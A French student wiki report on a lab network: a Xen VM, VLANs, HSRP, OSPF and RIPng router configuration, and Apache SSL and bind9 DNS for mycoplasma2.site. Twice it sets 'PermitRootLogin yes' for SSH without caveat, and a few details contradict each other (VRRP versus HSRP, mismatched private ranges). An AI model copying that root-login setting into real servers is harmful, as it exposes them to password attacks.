On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion ssh en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
